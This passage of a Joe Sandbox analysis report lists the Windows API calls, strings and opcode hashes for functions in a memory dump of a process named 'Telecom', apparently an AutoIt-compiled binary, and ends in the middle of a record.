                                                      • Opcode ID: 295cede90ee7ff6da8588f17b5706d456f890bef4dd7c38d57c31b91a93f7bf9
                                                      • Instruction ID: 7d313918de9c29d6d96ca2b079d06204bfe22f9de85dec4bd26bbdd9e94b3006
                                                      • Opcode Fuzzy Hash: 295cede90ee7ff6da8588f17b5706d456f890bef4dd7c38d57c31b91a93f7bf9
                                                      • Instruction Fuzzy Hash: F5919D74E00615ABDF608FA5CC48FAFBBB8EF45314F14855EE505AB280DB74A981CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 004C43C8
                                                      • CharUpperBuffW.USER32(?,?), ref: 004C44D7
                                                      • _wcslen.LIBCMT ref: 004C44E7
                                                      • VariantClear.OLEAUT32(?), ref: 004C467C
                                                        • Part of subcall function 004B169E: VariantInit.OLEAUT32(00000000), ref: 004B16DE
                                                        • Part of subcall function 004B169E: VariantCopy.OLEAUT32(?,?), ref: 004B16E7
                                                        • Part of subcall function 004B169E: VariantClear.OLEAUT32(?), ref: 004B16F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4137639002-1221869570
                                                      • Opcode ID: 8c22706b22dffbd0541eab5fcc631a85cb2548026f4e0f8443ff60871bcb5693
                                                      • Instruction ID: 8d4a4337639d9a3f20a9eac77bb851daebb8f92080d3a75cf7ca63ef80fcf10f
                                                      • Opcode Fuzzy Hash: 8c22706b22dffbd0541eab5fcc631a85cb2548026f4e0f8443ff60871bcb5693
                                                      • Instruction Fuzzy Hash: 63916A74A043019FC744DF25C590A6AB7E4FF89718F14892EF88987351DB39ED06CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004A08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?,?,004A0C4E), ref: 004A091B
                                                        • Part of subcall function 004A08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0936
                                                        • Part of subcall function 004A08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?,?), ref: 004A0944
                                                        • Part of subcall function 004A08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004A0831,80070057,?), ref: 004A0954
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 004C56AE
                                                      • _wcslen.LIBCMT ref: 004C57B6
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 004C582C
                                                      • CoTaskMemFree.OLE32(?), ref: 004C5837
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 614568839-2785691316
                                                      • Opcode ID: 342c5629f3710f7fa5d1bf5bd943fb9af48f41f7f6a9aa6496a9c443b5151082
                                                      • Instruction ID: d805c208ffbf8531128faa686fd59437d8eaf0fea001a26e1525bdbe6ff068a6
                                                      • Opcode Fuzzy Hash: 342c5629f3710f7fa5d1bf5bd943fb9af48f41f7f6a9aa6496a9c443b5151082
                                                      • Instruction Fuzzy Hash: 88910775D00219AFDF10DFA5D880EEEB7B8BF08304F10456EE915A7251DB78AA44CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetMenu.USER32(?), ref: 004D2C1F
                                                      • GetMenuItemCount.USER32(00000000), ref: 004D2C51
                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004D2C79
                                                      • _wcslen.LIBCMT ref: 004D2CAF
                                                      • GetMenuItemID.USER32(?,?), ref: 004D2CE9
                                                      • GetSubMenu.USER32(?,?), ref: 004D2CF7
                                                        • Part of subcall function 004A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004A43AD
                                                        • Part of subcall function 004A4393: GetCurrentThreadId.KERNEL32 ref: 004A43B4
                                                        • Part of subcall function 004A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004A2F00), ref: 004A43BB
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004D2D7F
                                                        • Part of subcall function 004AF292: Sleep.KERNEL32 ref: 004AF30A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                      • String ID:
                                                      • API String ID: 4196846111-0
                                                      • Opcode ID: cf1450dbf141f27806b2e59cad936a43f22ce39c2c3374588b1d5c0fda05ac1a
                                                      • Instruction ID: 93627d36cc1c81597c1430b888afc40d09c84f7a662a9266ae0b02eb5de78090
                                                      • Opcode Fuzzy Hash: cf1450dbf141f27806b2e59cad936a43f22ce39c2c3374588b1d5c0fda05ac1a
                                                      • Instruction Fuzzy Hash: F171AC75E00205AFCB00EF65C950AAEB7B1EF59314F10846BE816EB351DB78AE428B94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 004630BB
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 004630C3
                                                      • _ValidateLocalCookies.LIBCMT ref: 00463151
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0046317C
                                                      • _ValidateLocalCookies.LIBCMT ref: 004631D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: 7192929984598fb82648ee29b95ddd5c6298ec09fc6f8108055f2c38cc0ccd19
                                                      • Instruction ID: d1bf91b0cd689cd54c4c5e07c41632aea9d2fe9b560d4dce0111471780e86c2d
                                                      • Opcode Fuzzy Hash: 7192929984598fb82648ee29b95ddd5c6298ec09fc6f8108055f2c38cc0ccd19
                                                      • Instruction Fuzzy Hash: D541D834E002889BCF10DF59C885ADE7BB5AF46329F14815BE8146B392E739DF05CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetInputState.USER32 ref: 004B4310
                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 004B4367
                                                      • TranslateMessage.USER32(?), ref: 004B4390
                                                      • DispatchMessageW.USER32(?), ref: 004B439A
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004B43AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                      • String ID: (Q
                                                      • API String ID: 2256411358-2768264020
                                                      • Opcode ID: fd1c53a5d91801a0295e02ed4a1bc4a3685ace9dfa79af4504a13ac24c5bece9
                                                      • Instruction ID: ebed903efa4f57e44a755bbe5dcaa111839f87d1f21d6390192f8a65cb7d2856
                                                      • Opcode Fuzzy Hash: fd1c53a5d91801a0295e02ed4a1bc4a3685ace9dfa79af4504a13ac24c5bece9
                                                      • Instruction Fuzzy Hash: 7631CC70604345DEEB39CB74D848BF737E8AB50304F08556BD862C22A2E37C9599DB39
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A80D0
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A80F6
                                                      • SysAllocString.OLEAUT32(00000000), ref: 004A80F9
                                                      • SysAllocString.OLEAUT32(?), ref: 004A8117
                                                      • SysFreeString.OLEAUT32(?), ref: 004A8120
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 004A8145
                                                      • SysAllocString.OLEAUT32(?), ref: 004A8153
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 8c70ebbb3e91f0457a932a5e168317aa31380aed6f804692e451711f7e56e15a
                                                      • Instruction ID: d3f51d218943d88a57e267d8f61db354d837ca6bed0378bade9ff08da41c2f6e
                                                      • Opcode Fuzzy Hash: 8c70ebbb3e91f0457a932a5e168317aa31380aed6f804692e451711f7e56e15a
                                                      • Instruction Fuzzy Hash: 8921A772601219AFDF10DFA8CC88CBB73ACEB1A364704842AF915DB290DA74DC468768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A81A9
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004A81CF
                                                      • SysAllocString.OLEAUT32(00000000), ref: 004A81D2
                                                      • SysAllocString.OLEAUT32 ref: 004A81F3
                                                      • SysFreeString.OLEAUT32 ref: 004A81FC
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 004A8216
                                                      • SysAllocString.OLEAUT32(?), ref: 004A8224
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: 6579843174e0f22e11f272d476ca7f252c27389c5352c54e018a18950778a926
                                                      • Instruction ID: 046279980337c5ee3b6d2df12a0c0611a9461b495ee80ffce0b2f1226261bd97
                                                      • Opcode Fuzzy Hash: 6579843174e0f22e11f272d476ca7f252c27389c5352c54e018a18950778a926
                                                      • Instruction Fuzzy Hash: BA217772601104BF9B109BA8DC89DBB77ECFB5A364704812AF905CB2A0EA74DC41CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 004B0E99
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B0ED5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 9d461169661bcd4a1407b5af7e8ca89bbe5e4e1bb34179fd0be65f76e027e451
                                                      • Instruction ID: 1ef4bfc540ec0076638899300e13e76a52b2d858f954b8820ea99934b6ae0c56
                                                      • Opcode Fuzzy Hash: 9d461169661bcd4a1407b5af7e8ca89bbe5e4e1bb34179fd0be65f76e027e451
                                                      • Instruction Fuzzy Hash: 0C215E70A00309ABDB208F69DC04AEF77A8BF55725F204A6AFCA5D72D0D7B4D851CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 004B0F6D
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 004B0FA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 98a654913dc69e16c9e0bd64bdf1d9ec398c5edb2792fd3ffcb5aa82d95c9e4b
                                                      • Instruction ID: 3c48c52f73370a1ee2b40fd4697091cb28c86685470250eecbc826f6395a4c86
                                                      • Opcode Fuzzy Hash: 98a654913dc69e16c9e0bd64bdf1d9ec398c5edb2792fd3ffcb5aa82d95c9e4b
                                                      • Instruction Fuzzy Hash: 97219571600345DBDB309F688C04ADB77E8BF55725F200A1AF8A1D32E0D7B898A1DB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00447873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004478B1
                                                        • Part of subcall function 00447873: GetStockObject.GDI32(00000011), ref: 004478C5
                                                        • Part of subcall function 00447873: SendMessageW.USER32(00000000,00000030,00000000), ref: 004478CF
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004D4BB0
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004D4BBD
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004D4BC8
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004D4BD7
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004D4BE3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: a0815bb844d4ee62dcad7887e363cc890387ed4937d1c6839f1b510f28245cbf
                                                      • Instruction ID: bb06d2b24e90c1d074e28d52f621d4ac221b0fb8dbfe6a11d2f04e1f956e091d
                                                      • Opcode Fuzzy Hash: a0815bb844d4ee62dcad7887e363cc890387ed4937d1c6839f1b510f28245cbf
                                                      • Instruction Fuzzy Hash: 6B1193B155021DBEEF119FA5CC85EEB7F6DEF08758F014112B608A2190CB76DC219BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID: j`J
                                                      • API String ID: 2931989736-1240814797
                                                      • Opcode ID: 824bfaa4df5b7780e9c2c6cc00929ebf058f849f272792eb88bc414255ef0cb1
                                                      • Instruction ID: a38fd6ab61b6a6f48fe486138935d0f28f85d89a88aef54ccbf3877ea6ac598d
                                                      • Opcode Fuzzy Hash: 824bfaa4df5b7780e9c2c6cc00929ebf058f849f272792eb88bc414255ef0cb1
                                                      • Instruction Fuzzy Hash: 540126E26043047B931096225C42F6B731DDF3239EB1A0427FE058A241F76DED90C1AE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004AE328
                                                      • LoadStringW.USER32(00000000), ref: 004AE32F
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004AE345
                                                      • LoadStringW.USER32(00000000), ref: 004AE34C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004AE390
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 004AE36D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      • Opcode ID: 151bd3fd862caa1cdf5d14143d6ae01427031b9ff812edf5d17be96ea08d61e0
                                                      • Instruction ID: 64fa01a2f50eba8a13c2b24d49ca62f97a76f1610751faba38def1e7aea5e51b
                                                      • Opcode Fuzzy Hash: 151bd3fd862caa1cdf5d14143d6ae01427031b9ff812edf5d17be96ea08d61e0
                                                      • Instruction Fuzzy Hash: D20186F2D002087FE71197A48D89EFB776CDB08300F0145A3B716E6041E6749E848B79
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 004B1322
                                                      • EnterCriticalSection.KERNEL32(00000000,?), ref: 004B1334
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 004B1342
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004B1350
                                                      • CloseHandle.KERNEL32(00000000), ref: 004B135F
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 004B136F
                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 004B1376
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: f4b07ce9a1915cc67a8887509bb39aa386d5720aa0adcea8b33578bbfd1370e2
                                                      • Instruction ID: 340f159dc4b3172276622ef51d90c079c74bced76da740974e0f89d9dfd1721c
                                                      • Opcode Fuzzy Hash: f4b07ce9a1915cc67a8887509bb39aa386d5720aa0adcea8b33578bbfd1370e2
                                                      • Instruction Fuzzy Hash: FBF0EC32443612BBD7411B54EE4DBDABB79FF05302F802132F501918B097749471CF98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 004C281D
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004C283E
                                                      • WSAGetLastError.WSOCK32 ref: 004C284F
                                                      • htons.WSOCK32(?,?,?,?,?), ref: 004C2938
                                                      • inet_ntoa.WSOCK32(?), ref: 004C28E9
                                                        • Part of subcall function 004A433E: _strlen.LIBCMT ref: 004A4348
                                                        • Part of subcall function 004C3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,004BF669), ref: 004C3C9D
                                                      • _strlen.LIBCMT ref: 004C2992
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3203458085-0
                                                      • Opcode ID: 1ce0e1d12362c2a57b9d9aba9a74b299c21e37f03dbbcad74554bba45ce76e79
                                                      • Instruction ID: 38f8fa1eab197ac1f5257ee16345275d60909f8e1b552342e15eaeb205dd624c
                                                      • Opcode Fuzzy Hash: 1ce0e1d12362c2a57b9d9aba9a74b299c21e37f03dbbcad74554bba45ce76e79
                                                      • Instruction Fuzzy Hash: 00B11279600300AFD320DF25C885F2BB7A4AF84318F54855EF4564B3A2DBBAED42CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __allrem.LIBCMT ref: 0047042A
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00470446
                                                      • __allrem.LIBCMT ref: 0047045D
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0047047B
                                                      • __allrem.LIBCMT ref: 00470492
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004704B0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
